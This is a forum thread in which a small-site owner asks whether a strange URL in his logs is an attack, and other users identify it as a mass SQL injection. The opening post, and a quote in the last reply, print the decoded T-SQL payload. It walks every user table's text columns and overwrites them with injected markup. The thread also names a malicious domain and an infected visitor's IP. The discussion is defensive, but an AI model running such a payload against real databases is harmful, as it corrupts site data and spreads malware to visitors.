Skip to content
View in the app

A better way to browse. Learn more.
Tip.It Forum

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Am I Being H4X0R3D?

lordkafei
in Tech and Computers

Featured Replies

I run a small niche site (nothing to do with Runescape or gaming).

 

 

 

Tonight, while looking at my logs, I noticed someone trying to reach a strange URL:

 

 

 


http://[my site url was here]/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152 ...

 

 

 

After decoding all that hex, I got this:

 

 

 



DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''">

PvP is not for me

In the 3rd Year of the Boycott
Real-world money saved since FT/W: Hundreds of Dollars
Real-world time saved since FT/W: Thousands of Hours

From what I can see, and the fact I'm an amateur, I'd daresay it's a keylogger, an injection attack, a tracker, or a rootkit. Try not to go to the website in the hex, I can't guarantee it's a clean link.

I was going to eat hot dogs for dinner tonight. I think I will settle for cereal.

 

OPEN WIDE HERE COMES THE HELICOPTER.

http://www.siteadvisor.com/sites/douhunqn.cn

 

 

 

Check the comment on the bottom. ultimania92 was right on almost all counts there lol, that site (and all the ones it links to apparently) has links to browser exploits. Just google search douhunqn.cn, the results pretty much confirm what the SiteAdvisor site said.

[hide=Funny Quotes]

So you sucker punched a kid in the back of the head? Good job.
What scares me is that you're like 10 years old.
-.- im not that freaking young
You were a couple years ago.
It's not racist if its true.
Hmm... I wonder how one goes about throwing someone out a window in a mystic fashion :-k

 

The mental image for that is freaking awesome.

[/hide]

- I dont need to "get a life." I'm a gamer - I have LOTS of lives!

  • Author

Thanks for the info.

 

 

 

The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet.

 

 

 

141.158.58.64

PvP is not for me

In the 3rd Year of the Boycott
Real-world money saved since FT/W: Hundreds of Dollars
Real-world time saved since FT/W: Thousands of Hours

Thanks for the info.

 

 

 

The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet.

 

 

 

141.158.58.64

 

 

 

That would be just about right, why he didn't hide his IP though is beyond me.

I was going to eat hot dogs for dinner tonight. I think I will settle for cereal.

 

OPEN WIDE HERE COMES THE HELICOPTER.

Well generally, people who are unknowingly infected and become a part of a botnet don't try to hide their IP.

 

 

 

These people are usually the one's who don't know what botnets are and leave their computer open to them in the first place.

Something to fill my sig with until I find a replacement.

Also check out my blug

Thanks for the info.

 

 

 

The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet.

 

 

 

141.158.58.64

 

You're right on, lordkafei. It is a person who didn't properly protect their PC, and is currently an unknowing host to a bot on their system. Further info is at the link below...

 

 

 

http://network-tools.com/default.asp?prog=express&host=141.158.58.64

 

(Note: I don't provide bad links. It is clean, so go have a look!)

 

 

 

I suggest that you note the date and time of when the attack occurred, and get in touch with Verizon in Philadelphia. They will be able to put an end to this problem, forever. :ugeek:

 

 

 

~Mr. D. V. Devnull

tifuserbar-dsavi_x4.jpg and normally with a cool mind.

(Warning: This user can be VERY confusing to some people... And talks in 3rd person for the timebeing due to how insane they are... Sometimes even to themself.)

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''">

Create an account or sign in to comment
Go to topic listing

Important Information

By using this site, you agree to our Terms of Use.

I accept

Account

Navigation

Search

Search

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.